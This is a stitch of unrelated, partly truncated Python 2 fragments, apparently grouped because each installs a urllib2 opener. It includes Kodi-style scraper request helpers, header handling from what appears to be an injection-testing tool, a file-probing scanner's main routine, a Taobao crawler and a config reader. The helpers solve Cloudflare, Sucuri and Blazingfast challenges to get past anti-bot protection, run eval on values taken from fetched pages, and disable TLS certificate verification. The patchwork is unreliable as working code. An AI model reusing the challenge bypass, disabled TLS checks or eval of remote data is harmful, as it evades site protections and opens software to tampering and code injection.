checks.wildcard_character( menu.options.header) extra_headers = menu.options.header extra_headers = extra_headers.replace(":", ": ") if ": //" in extra_headers: extra_headers = extra_headers.replace(": //", "://") if "\\n" in extra_headers: extra_headers = extra_headers.split("\\n") # Remove empty strings extra_headers = [x for x in extra_headers if x] if menu.options.header and not menu.options.headers and len( extra_headers) > 1: warn_msg = "Swithing '--header' to '--headers' " warn_msg += "due to multiple extra HTTP headers." print settings.print_warning_msg(warn_msg) else: tmp_extra_header = [] tmp_extra_header.append(extra_headers) extra_headers = tmp_extra_header for extra_header in extra_headers: # Extra HTTP Header name http_header_name = re.findall(r"(.*): ", extra_header) http_header_name = ''.join(http_header_name).strip() # Extra HTTP Header value http_header_value = re.findall(r":(.*)", extra_header) http_header_value = ''.join(http_header_value).strip() # Check if it is a custom header injection. if settings.CUSTOM_HEADER_INJECTION == False and \ settings.INJECT_TAG in http_header_value: settings.CUSTOM_HEADER_INJECTION = True settings.CUSTOM_HEADER_NAME = http_header_name request.add_header(http_header_name, http_header_value)
def get_cookie(self, netloc, ua, timeout): try: headers = {'User-Agent': ua} request = urllib2.Request(netloc) _add_request_header(request, headers) try: response = urllib2.urlopen(request, timeout=int(timeout)) except urllib2.HTTPError as response: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile( fileobj=StringIO.StringIO(result)).read() jschl = re.findall('name="jschl_vc" value="(.+?)"/>', result)[0] init = re.findall('setTimeout\(function\(\){\s*.*?.*:(.*?)};', result)[-1] builder = re.findall(r"challenge-form\'\);\s*(.*)a.v", result)[0] decryptVal = self.parseJSString(init) lines = builder.split(';') for line in lines: if len(line) > 0 and '=' in line: sections = line.split('=') line_val = self.parseJSString(sections[1]) decryptVal = int( eval( str(decryptVal) + sections[0][-1] + str(line_val))) answer = decryptVal + len(urlparse.urlparse(netloc).netloc) query = '%s/cdn-cgi/l/chk_jschl?jschl_vc=%s&jschl_answer=%s' % ( netloc, jschl, answer) if 'type="hidden" name="pass"' in result: passval = re.findall('name="pass" value="(.*?)"', result)[0] query = '%s/cdn-cgi/l/chk_jschl?pass=%s&jschl_vc=%s&jschl_answer=%s' % ( netloc, urllib.quote_plus(passval), jschl, answer) time.sleep(6) cookies = cookielib.LWPCookieJar() handlers = [ urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies) ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) try: request = urllib2.Request(query) _add_request_header(request, headers) response = urllib2.urlopen(request, timeout=int(timeout)) except: pass cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies]) if 'cf_clearance' in cookie: self.cookie = cookie except: pass
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, XHR=False, limit=None, referer=None, cookie=None, compression=True, output='', timeout='30', ignoreSsl=False, flare=True, ignoreErrors=None): try: if url is None: return None handlers = [] if proxy is not None: handlers += [ urllib2.ProxyHandler({'http': '%s' % (proxy)}), urllib2.HTTPHandler ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if output == 'cookie' or output == 'extended' or not close is True: cookies = cookielib.LWPCookieJar() handlers += [ urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies) ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if ignoreSsl or ((2, 7, 8) < sys.version_info < (2, 7, 12)): try: import ssl ssl_context = ssl.create_default_context() ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE handlers += [urllib2.HTTPSHandler(context=ssl_context)] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) except: pass if url.startswith('//'): url = 'http:' + url try: headers.update(headers) except: headers = {} if 'User-Agent' in headers: pass elif mobile is not True: # headers['User-Agent'] = agent() headers['User-Agent'] = cache.get(randomagent, 1) else: headers['User-Agent'] = 'Apple-iPhone/701.341' if 'Referer' in headers: pass elif referer is not None: headers['Referer'] = referer if 'Accept-Language' not in headers: headers['Accept-Language'] = 'en-US' if 'X-Requested-With' in headers: pass elif XHR is True: headers['X-Requested-With'] = 'XMLHttpRequest' if 'Cookie' in headers: pass elif cookie is not None: headers['Cookie'] = cookie if 'Accept-Encoding' in headers: pass elif compression and limit is None: headers['Accept-Encoding'] = 'gzip' if redirect is False: class NoRedirection(urllib2.HTTPErrorProcessor): def http_response(self, request, response): return response opener = urllib2.build_opener(NoRedirection) opener = urllib2.install_opener(opener) try: del headers['Referer'] except: pass if isinstance(post, dict): # Gets rid of the error: 'ascii' codec can't decode byte 0xd0 in position 0: ordinal not in range(128) for key, value in post.iteritems(): try: post[key] = value.encode('utf-8') except: pass post = urllib.urlencode(post) request = urllib2.Request(url, data=post) _add_request_header(request, headers) try: response = urllib2.urlopen(request, timeout=int(timeout)) except urllib2.HTTPError as response: try: ignore = ignoreErrors and (int(response.code) == ignoreErrors or int( response.code) in ignoreErrors) except: ignore = False if not ignore: if response.code in [301, 307, 308, 503]: cf_result = response.read(5242880) try: encoding = response.info().getheader( 'Content-Encoding') except: encoding = None if encoding == 'gzip': cf_result = gzip.GzipFile( fileobj=StringIO.StringIO(cf_result)).read() if flare and 'cloudflare' in str(response.info()).lower(): try: from resources.lib.modules import cfscrape if isinstance(post, dict): data = post else: try: data = urlparse.parse_qs(post) except: data = None scraper = cfscrape.CloudflareScraper() response = scraper.request( method='GET' if post is None else 'POST', url=url, headers=headers, data=data, timeout=int(timeout)) result = response.content flare = 'cloudflare' # Used below try: cookies = response.request._cookies except: log_utils.error() except: log_utils.error() elif 'cf-browser-verification' in cf_result: netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) ua = headers['User-Agent'] cf = cache.get(cfcookie().get, 168, netloc, ua, timeout) headers['Cookie'] = cf request = urllib2.Request(url, data=post) _add_request_header(request, headers) response = urllib2.urlopen(request, timeout=int(timeout)) else: log_utils.log( 'Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG) if error is False: return else: log_utils.log( 'Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG) if error is False: return if output == 'cookie': try: result = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: result = cf except: pass if close is True: response.close() return result elif output == 'geturl': result = response.geturl() if close is True: response.close() return result elif output == 'headers': result = response.headers if close is True: response.close() return result elif output == 'chunk': try: content = int(response.headers['Content-Length']) except: content = (2049 * 1024) if content < (2048 * 1024): return result = response.read(16 * 1024) if close is True: response.close() return result if flare != 'cloudflare': if limit == '0': result = response.read(224 * 1024) elif limit is not None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read() if 'sucuri_cloudproxy_js' in result: su = sucuri().get(result) headers['Cookie'] = su request = urllib2.Request(url, data=post) _add_request_header(request, headers) response = urllib2.urlopen(request, timeout=int(timeout)) if limit == '0': result = response.read(224 * 1024) elif limit is not None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile( fileobj=StringIO.StringIO(result)).read() if 'Blazingfast.io' in result and 'xhr.open' in result: netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) ua = headers['User-Agent'] headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua, timeout) result = _basic_request(url, headers=headers, post=post, timeout=timeout, limit=limit) if output == 'extended': try: response_headers = dict([(item[0].title(), item[1]) for item in response.info().items()]) except: response_headers = response.headers try: response_code = str(response.code) except: response_code = str(response.status_code ) # object from CFScrape Requests object. try: cookie = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: cookie = cf except: pass if close is True: response.close() return (result, response_code, response_headers, headers, cookie) else: if close is True: response.close() return result except Exception as e: log_utils.error() log_utils.log('Request-Error: (%s) => %s' % (str(e), url), log_utils.LOGDEBUG) return
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, limit=None, referer=None, cookie=None, output='', timeout='30'): try: #control.log('@@@@@@@@@@@@@@ - URL:%s' % url) handlers = [] if not proxy == None: handlers += [ urllib2.ProxyHandler({'http': '%s' % (proxy)}), urllib2.HTTPHandler ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if output == 'cookie2' or output == 'cookie' or output == 'extended' or not close == True: cookies = cookielib.LWPCookieJar() handlers += [ urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies) ] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) try: if sys.version_info < (2, 7, 9): raise Exception() import ssl ssl_context = ssl.create_default_context() ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE handlers += [urllib2.HTTPSHandler(context=ssl_context)] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) except: pass try: headers.update(headers) except: headers = {} if 'User-Agent' in headers: pass elif not mobile == True: #headers['User-Agent'] = agent() headers['User-Agent'] = cache.get(randomagent, 1) else: headers['User-Agent'] = 'Apple-iPhone/701.341' if 'Referer' in headers: pass elif referer == None: headers['Referer'] = '%s://%s/' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) else: headers['Referer'] = referer if not 'Accept-Language' in headers: headers['Accept-Language'] = 'en-US' if 'Cookie' in headers: pass elif not cookie == None: headers['Cookie'] = cookie if redirect == False: class NoRedirection(urllib2.HTTPErrorProcessor): def http_response(self, request, response): return response opener = urllib2.build_opener(NoRedirection) opener = urllib2.install_opener(opener) try: del headers['Referer'] except: pass request = urllib2.Request(url, data=post, headers=headers) try: response = urllib2.urlopen(request, timeout=int(timeout)) except urllib2.HTTPError as response: control.log("AAAA- CODE %s|%s " % (url, response.code)) if response.code == 503: if 'cf-browser-verification' in response.read(5242880): control.log("CF-OK") netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) cf = cache.get(cfcookie, 168, netloc, headers['User-Agent'], timeout) headers['Cookie'] = cf request = urllib2.Request(url, data=post, headers=headers) response = urllib2.urlopen(request, timeout=int(timeout)) elif error == False: return elif response.code == 307: control.log("AAAA- Location: %s" % (response.headers['Location'].rstrip())) cookie = '' try: cookie = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass headers['Cookie'] = cookie request = urllib2.Request(response.headers['Location'], data=post, headers=headers) response = urllib2.urlopen(request, timeout=int(timeout)) #control.log("AAAA- BBBBBBB %s" % response.code) elif error == False: print("Response code", response.code, response.msg, url) return if output == 'cookie': try: result = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: result = cf except: pass elif output == 'response': if limit == '0': result = (str(response.code), response.read(224 * 1024)) elif not limit == None: result = (str(response.code), response.read(int(limit) * 1024)) else: result = (str(response.code), response.read(5242880)) elif output == 'chunk': try: content = int(response.headers['Content-Length']) except: content = (2049 * 1024) if content < (2048 * 1024): return result = response.read(16 * 1024) elif output == 'extended': try: cookie = '; '.join( ['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: cookie = cf except: pass content = response.headers result = response.read(5242880) return (result, headers, content, cookie) elif output == 'geturl': result = response.geturl() elif output == 'headers': content = response.headers return content else: if limit == '0': result = response.read(224 * 1024) elif not limit == None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) if close == True: response.close() return result except Exception as e: control.log('Client ERR %s, url:' % (e, url)) return
''' response = urllib2.urlopen('http://www.baidu.com') print response.getcode() cont = response.read() ''' url = 'http://www.baidu.com' request = urllib2.Request(url) request.add_header('User-Agent', 'Mozilla/5.0') response = urllib2.urlopen(request) print response.getcode() cont = response.read() ''' url = "http://www.baid.com" cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) response = urllib2.urlopen(url) print response.getcode() cont = response.read() ''' try: f = os.open('index.html', os.O_CREAT | os.O_RDWR) os.write(f, cont) except:
def download_file(self): logger.info("Direct download") headers = [] # Se asegura de que el fichero se podrá crear logger.info("nombrefichero=" + self.file_name) self.file_name = xbmc.makeLegalFilename(self.file_name) logger.info("nombrefichero=" + self.file_name) logger.info("url=" + self.url) # Crea el fichero existSize = 0 f = open(self.file_name, 'wb') grabado = 0 # Interpreta las cabeceras en una URL como en XBMC if "|" in self.url: additional_headers = self.url.split("|")[1] if "&" in additional_headers: additional_headers = additional_headers.split("&") else: additional_headers = [additional_headers] for additional_header in additional_headers: logger.info("additional_header: " + additional_header) name = re.findall("(.*?)=.*?", additional_header)[0] value = urllib.unquote_plus( re.findall(".*?=(.*?)$", additional_header)[0]) headers.append([name, value]) self.url = self.url.split("|")[0] logger.info("url=" + self.url) # Timeout del socket a 60 segundos socket.setdefaulttimeout(60) # Crea la petición y añade las cabeceras h = urllib2.HTTPHandler(debuglevel=0) request = urllib2.Request(self.url) for header in headers: logger.info("Header=" + header[0] + ": " + header[1]) request.add_header(header[0], header[1]) # Lanza la petición opener = urllib2.build_opener(h) urllib2.install_opener(opener) try: connexion = opener.open(request) except urllib2.HTTPError, e: logger.error("error %d (%s) al abrir la url %s" % (e.code, e.msg, self.url)) # print e.code # print e.msg # print e.hdrs # print e.fp f.close() # El error 416 es que el rango pedido es mayor que el fichero => es que ya está completo if e.code == 416: return 0 else: return -2
def main(): """ Initializes and executes the program """ global args kb.files = [] kb.found = False kb.print_lock = threading.Lock() kb.value_lock = threading.Lock() kb.versioned_locations = {} check_revision() print(BANNER) args = parse_args() if args.update: update() exit() with open("versions.ini") as f: section = None for line in f.xreadlines(): line = line.strip() if re.match(r"\[.+\]", line): section = line.strip("[]") elif line: if section not in kb.versioned_locations: kb.versioned_locations[section] = [] kb.versioned_locations[section].append(line) cases = get_cases(args) if not args.list_file else load_list( args.list_file) if not cases: print("[!] No available test cases with the specified attributes.\n" "[!] Please verify available options with --list.") exit() if args.list: args.list = args.list.lower() _ = ("category", "software", "os") if args.list not in _: print("[!] Valid values for option '--list' are: %s" % ", ".join(_)) exit() print("[i] Listing available filters for usage with option '--%s':\n" % args.list) try: for _ in set([_[args.list] for _ in cases]): print(_ if re.search(r"\A[A-Za-z0-9]+\Z", _) else '"%s"' % _) except KeyError: pass finally: exit() if args.ignore_proxy: _ = ProxyHandler({}) opener = build_opener(_) install_opener(opener) elif args.proxy: match = re.search( r"(?P<type>[^:]+)://(?P<address>[^:]+):(?P<port>\d+)", args.proxy, re.I) if match: if match.group("type").upper() in (PROXY_TYPE.HTTP, PROXY_TYPE.HTTPS): _ = ProxyHandler({match.group("type"): args.proxy}) opener = build_opener(_) install_opener(opener) else: from thirdparty.socks import socks if match.group("type").upper() == PROXY_TYPE.SOCKS4: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, match.group("address"), int(match.group("port")), True) elif match.group("type").upper() == PROXY_TYPE.SOCKS5: socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, match.group("address"), int(match.group("port")), True) else: print( "[!] Wrong proxy format (proper example: \"http://127.0.0.1:8080\")." ) exit() if args.random_agent: with open(USER_AGENTS_FILE, 'r') as f: args.user_agent = random.sample(f.readlines(), 1)[0] kb.parsed_target_url = urlsplit(args.url) kb.request_params = args.data if args.data else kb.parsed_target_url.query if not args.param: match = re.match("(?P<param>[^=&]+)=(?P<value>[^=&]+)", kb.request_params) if match: args.param = match.group("param") else: found = False for match in re.finditer("(?P<param>[^=&]+)=(?P<value>[^=&]*)", kb.request_params): found = True print("[x] Parameter with empty value found ('%s')." % match.group("param")) if found: print( "[!] Please always use non-empty (valid) parameter values." ) print("[!] No usable GET/POST parameters found.") exit() if args.os: kb.restrict_os = args.os print("[i] Starting scan at: %s\n" % time.strftime("%X")) print("[i] Checking original response...") request_args = prepare_request(None) request_args["url"] = args.url if args.data: request_args["data"] = args.data kb.original_response = get_page(**request_args) if not kb.original_response: print("[!] Something seems to be wrong with connection settings.") if not args.verbose: print("[i] Please rerun with switch '-v'.") exit() print("[i] Checking invalid response...") request_args = prepare_request( "%s%s%s" % (args.prefix, INVALID_FILENAME, args.postfix)) kb.invalid_response = get_page(**request_args) print("[i] Done!") print("[i] Searching for files...") if args.threads > 1: print("[i] Starting %d threads." % args.threads) threads = [] for i in xrange(args.threads): thread = threading.Thread( target=try_cases, args=([cases[_] for _ in xrange(i, len(cases), args.threads)], )) thread.daemon = True thread.start() threads.append(thread) alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1) if not kb.found: print("[i] No files found!") elif args.verbose: print("\n[i] Files found:") for _ in kb.files: print("[o] %s" % _) print(" \n[i] File search complete.") print("\n[i] Finishing scan at: %s\n" % time.strftime("%X"))
def request(url, close=True, redirect=True, error=False, proxy=None, post=None, headers=None, mobile=False, XHR=False, limit=None, referer=None, cookie=None, compression=True, output='', timeout='30'): try: if not url: return handlers = [] if not proxy == None: handlers += [urllib2.ProxyHandler({'http':'%s' % (proxy)}), urllib2.HTTPHandler] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if output == 'cookie' or output == 'extended' or not close == True: cookies = cookielib.LWPCookieJar() handlers += [urllib2.HTTPHandler(), urllib2.HTTPSHandler(), urllib2.HTTPCookieProcessor(cookies)] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) if (2, 7, 8) < sys.version_info < (2, 7, 12): try: import ssl; ssl_context = ssl.create_default_context() ssl_context.check_hostname = False ssl_context.verify_mode = ssl.CERT_NONE handlers += [urllib2.HTTPSHandler(context=ssl_context)] opener = urllib2.build_opener(*handlers) opener = urllib2.install_opener(opener) except: pass if url.startswith('//'): url = 'http:' + url _headers ={} try: _headers.update(headers) except: pass if 'User-Agent' in _headers: pass elif not mobile == True: #headers['User-Agent'] = agent() _headers['User-Agent'] = cache.get(randomagent, 1) else: _headers['User-Agent'] = 'Apple-iPhone/701.341' if 'Referer' in _headers: pass elif referer is not None: _headers['Referer'] = referer if not 'Accept-Language' in _headers: _headers['Accept-Language'] = 'en-US' if 'X-Requested-With' in _headers: pass elif XHR == True: _headers['X-Requested-With'] = 'XMLHttpRequest' if 'Cookie' in _headers: pass elif not cookie == None: _headers['Cookie'] = cookie if 'Accept-Encoding' in _headers: pass elif compression and limit is None: _headers['Accept-Encoding'] = 'gzip' if redirect == False: #old implementation #class NoRedirection(urllib2.HTTPErrorProcessor): # def http_response(self, request, response): return response #opener = urllib2.build_opener(NoRedirection) #opener = urllib2.install_opener(opener) class NoRedirectHandler(urllib2.HTTPRedirectHandler): def http_error_302(self, req, fp, code, msg, headers): infourl = urllib.addinfourl(fp, headers, req.get_full_url()) infourl.status = code infourl.code = code return infourl http_error_300 = http_error_302 http_error_301 = http_error_302 http_error_303 = http_error_302 http_error_307 = http_error_302 opener = urllib2.build_opener(NoRedirectHandler()) urllib2.install_opener(opener) try: del _headers['Referer'] except: pass if isinstance(post, dict): post = utils.byteify(post) post = urllib.urlencode(post) url = utils.byteify(url) request = urllib2.Request(url, data=post) _add_request_header(request, _headers) try: response = urllib2.urlopen(request, timeout=int(timeout)) except urllib2.HTTPError as response: if response.code == 503: cf_result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': cf_result = gzip.GzipFile(fileobj=StringIO.StringIO(cf_result)).read() if 'cf-browser-verification' in cf_result: netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) if not netloc.endswith('/'): netloc += '/' ua = _headers['User-Agent'] cf = cache.get(cfcookie().get, 168, netloc, ua, timeout) _headers['Cookie'] = cf request = urllib2.Request(url, data=post) _add_request_header(request, _headers) response = urllib2.urlopen(request, timeout=int(timeout)) else: log_utils.log('Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG) if error == False: return else: log_utils.log('Request-Error (%s): %s' % (str(response.code), url), log_utils.LOGDEBUG) if error == False: return if output == 'cookie': try: result = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: result = cf except: pass if close == True: response.close() return result elif output == 'geturl': result = response.geturl() if close == True: response.close() return result elif output == 'headers': result = response.headers if close == True: response.close() return result elif output == 'chunk': try: content = int(response.headers['Content-Length']) except: content = (2049 * 1024) if content < (2048 * 1024): return result = response.read(16 * 1024) if close == True: response.close() return result elif output == 'file_size': try: content = int(response.headers['Content-Length']) except: content = '0' response.close() return content if limit == '0': result = response.read(224 * 1024) elif not limit == None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read() if 'sucuri_cloudproxy_js' in result: su = sucuri().get(result) _headers['Cookie'] = su request = urllib2.Request(url, data=post) _add_request_header(request, _headers) response = urllib2.urlopen(request, timeout=int(timeout)) if limit == '0': result = response.read(224 * 1024) elif not limit == None: result = response.read(int(limit) * 1024) else: result = response.read(5242880) try: encoding = response.info().getheader('Content-Encoding') except: encoding = None if encoding == 'gzip': result = gzip.GzipFile(fileobj=StringIO.StringIO(result)).read() if 'Blazingfast.io' in result and 'xhr.open' in result: netloc = '%s://%s' % (urlparse.urlparse(url).scheme, urlparse.urlparse(url).netloc) ua = _headers['User-Agent'] _headers['Cookie'] = cache.get(bfcookie().get, 168, netloc, ua, timeout) result = _basic_request(url, headers=_headers, post=post, timeout=timeout, limit=limit) if output == 'extended': try: response_headers = dict([(item[0].title(), item[1]) for item in response.info().items()]) except: response_headers = response.headers response_code = str(response.code) try: cookie = '; '.join(['%s=%s' % (i.name, i.value) for i in cookies]) except: pass try: cookie = cf except: pass if close == True: response.close() return (result, response_code, response_headers, _headers, cookie) else: if close == True: response.close() return result except Exception as e: log_utils.log('Request-Error: (%s) => %s' % (str(e), url), log_utils.LOGDEBUG) return
from decimal import Decimal from pygaga.helpers.cachedns_urllib import custom_dns_opener from pygaga.helpers.urlutils import download, parse_html from pygaga.helpers.statsd import statsd_timing from pygaga.simplejson import loads from pygaga.helpers.utils import get_val, get_num_val from guang_crawler import comments_pb2 logger = logging.getLogger('CrawlLogger') FLAGS = gflags.FLAGS DEFAULT_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)" urllib2.install_opener(custom_dns_opener()) CURPAGE_RE = re.compile("^(.*currentPage=)([^&]*?)(&.*|)$") JSON_RE = re.compile("^\s*jsonp_reviews_list\((.+)\)\s*$", re.M | re.S) TM_JSON_RE = re.compile("^\s*TB.detailRate\s*=\s*(.+)$", re.M | re.S) RATECOUNT_RE = re.compile("^.*<em>([0-9]+)</em>.*$", re.M | re.S) DESCURL_RE = re.compile("http://dsc.taobaocdn.com/i\d[^\"']+\.desc[^\"']*", re.M | re.S) IMAGESTYLE_RE = re.compile("^.*url\(([^\)]+)\)$", re.M | re.S) class TaobaoHtml: def __init__(self, item_id, num_id, is_tmall=False, max_comments=0): self.item_id = item_id self.num_id = num_id
def __init__(self, username=None, password=None, filter=None, tmp_dir='/tmp'): ContentProvider.__init__(self, 'barrandov.tv', 'http://www.barrandov.tv', username, password, filter, tmp_dir) opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) urllib2.install_opener(opener)
def read_config(config_file): global config if not os.path.isfile(config_file): exit("[!] missing configuration file '%s'" % config_file) else: print "[i] using configuration file '%s'" % config_file config.clear() try: array = None content = open(config_file, "rb").read() for line in content.split("\n"): line = line.strip('\r') line = re.sub(r"\s*#.*", "", line) if not line.strip(): continue if line.count(' ') == 0: if re.search(r"[^\w]", line): if array == "USERS": exit("[!] invalid USERS entry '%s'\n[?] (hint: add whitespace at start of line)" % line) else: exit("[!] invalid configuration (line: '%s')" % line) array = line.upper() config[array] = [] continue if array and line.startswith(' '): config[array].append(line.strip()) continue else: array = None try: name, value = line.strip().split(' ', 1) except ValueError: name = line value = "" finally: name = name.strip().upper() value = value.strip("'\"").strip() _ = os.environ.get("%s_%s" % (NAME.upper(), name)) if _: value = _ if any(name.startswith(_) for _ in ("USE_", "SET_", "CHECK_", "ENABLE_", "SHOW_", "DISABLE_")): value = value.lower() in ("1", "true") elif value.isdigit(): value = int(value) else: for match in re.finditer(r"\$([A-Z0-9_]+)", value): if match.group(1) in globals(): value = value.replace(match.group(0), str(globals()[match.group(1)])) else: value = value.replace(match.group(0), os.environ.get(match.group(1), match.group(0))) if name.endswith("_DIR"): value = os.path.realpath(os.path.join(ROOT_DIR, os.path.expanduser(value))) config[name] = value except (IOError, OSError): pass for option in ("MONITOR_INTERFACE", "CAPTURE_BUFFER", "LOG_DIR"): if not option in config: exit("[!] missing mandatory option '%s' in configuration file '%s'" % (option, config_file)) for entry in (config.USERS or []): if len(entry.split(':')) != 4: exit("[!] invalid USERS entry '%s'" % entry) if re.search(r"\$\d+\$", entry): exit("[!] invalid USERS entry '%s'\n[?] (hint: please update PBKDF2 hashes to SHA256 in your configuration file)" % entry) if config.SSL_PEM: config.SSL_PEM = config.SSL_PEM.replace('/', os.sep) if config.USER_WHITELIST: if ',' in config.USER_WHITELIST: print("[x] configuration value 'USER_WHITELIST' has been changed. Please use it to set location of whitelist file") elif not os.path.isfile(config.USER_WHITELIST): exit("[!] missing 'USER_WHITELIST' file '%s'" % config.USER_WHITELIST) else: read_whitelist() config.PROCESS_COUNT = int(config.PROCESS_COUNT or CPU_CORES) if config.USE_MULTIPROCESSING: print("[x] configuration switch 'USE_MULTIPROCESSING' is deprecated. Please use 'PROCESS_COUNT' instead") if config.DISABLE_LOCAL_LOG_STORAGE and not any((config.LOG_SERVER, config.SYSLOG_SERVER)): print("[x] configuration switch 'DISABLE_LOCAL_LOG_STORAGE' turned on and neither option 'LOG_SERVER' nor 'SYSLOG_SERVER' are set. Falling back to console output of event data") if config.UDP_ADDRESS is not None and config.UDP_PORT is None: exit("[!] usage of configuration value 'UDP_ADDRESS' requires also usage of 'UDP_PORT'") if config.UDP_ADDRESS is None and config.UDP_PORT is not None: exit("[!] usage of configuration value 'UDP_PORT' requires also usage of 'UDP_ADDRESS'") if not str(config.HTTP_PORT or "").isdigit(): exit("[!] invalid configuration value for 'HTTP_PORT' ('%s')" % config.HTTP_PORT) if config.PROCESS_COUNT and subprocess.mswindows: print "[x] multiprocessing is currently not supported on Windows OS" config.PROCESS_COUNT = 1 if config.CAPTURE_BUFFER: if str(config.CAPTURE_BUFFER or "").isdigit(): config.CAPTURE_BUFFER = int(config.CAPTURE_BUFFER) elif re.search(r"\d+\s*[kKmMgG]B", config.CAPTURE_BUFFER): match = re.search(r"(\d+)\s*([kKmMgG])B", config.CAPTURE_BUFFER) config.CAPTURE_BUFFER = int(match.group(1)) * {"K": 1024, "M": 1024 ** 2, "G": 1024 ** 3}[match.group(2).upper()] elif re.search(r"\d+%", config.CAPTURE_BUFFER): physmem = _get_total_physmem() if physmem: config.CAPTURE_BUFFER = physmem * int(re.search(r"(\d+)%", config.CAPTURE_BUFFER).group(1)) / 100 else: exit("[!] unable to determine total physical memory. Please use absolute value for 'CAPTURE_BUFFER'") else: exit("[!] invalid configuration value for 'CAPTURE_BUFFER' ('%s')" % config.CAPTURE_BUFFER) config.CAPTURE_BUFFER = config.CAPTURE_BUFFER / BLOCK_LENGTH * BLOCK_LENGTH if config.PROXY_ADDRESS: PROXIES.update({"http": config.PROXY_ADDRESS, "https": config.PROXY_ADDRESS}) opener = urllib2.build_opener(urllib2.ProxyHandler(PROXIES)) urllib2.install_opener(opener)
def read_body_and_headers(url,post=None,headers=[],follow_redirects=False,timeout=None): _log("read_body_and_headers "+url) if post is not None: _log("read_body_and_headers post="+post) if len(headers)==0: headers.append(["User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0"]) # Start cookie lib ficherocookies=os.path.join(get_data_path(),'cookies.dat'); _log("read_body_and_headers cookies_file="+ficherocookies); cj=None; ClientCookie=None; cookielib=None try: _log("read_body_and_headers importing cookielib"); import cookielib # Let's see if cookielib is available except ImportError: _log("read_body_and_headers cookielib no disponible") # If importing cookielib fails # let's try ClientCookie try: _log("read_body_and_headers importing ClientCookie"); import ClientCookie except ImportError: _log("read_body_and_headers ClientCookie not available"); urlopen=urllib2.urlopen; Request=urllib2.Request # ClientCookie isn't available either else: _log("read_body_and_headers ClientCookie available"); urlopen=ClientCookie.urlopen; Request=ClientCookie.Request; cj=ClientCookie.MozillaCookieJar() # imported ClientCookie else: _log("read_body_and_headers cookielib available"); urlopen=urllib2.urlopen; Request=urllib2.Request; cj=cookielib.MozillaCookieJar() # importing cookielib worked # This is a subclass of FileCookieJar # that has useful load and save methods if cj is not None: # we successfully imported # one of the two cookie handling modules _log("read_body_and_headers Cookies enabled") if os.path.isfile(ficherocookies): _log("read_body_and_headers Reading cookie file") try: cj.load(ficherocookies) # if we have a cookie file already saved # then load the cookies into the Cookie Jar except: _log("read_body_and_headers Wrong cookie file, deleting..."); os.remove(ficherocookies) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: _log("read_body_and_headers opener using urllib2 (cookielib)") # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 if not follow_redirects: opener=urllib2.build_opener(urllib2.HTTPHandler(debuglevel=http_debug_log_enabled),urllib2.HTTPCookieProcessor(cj),NoRedirectHandler()) else: opener=urllib2.build_opener(urllib2.HTTPHandler(debuglevel=http_debug_log_enabled),urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: _log("read_body_and_headers opener using ClientCookie") # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie 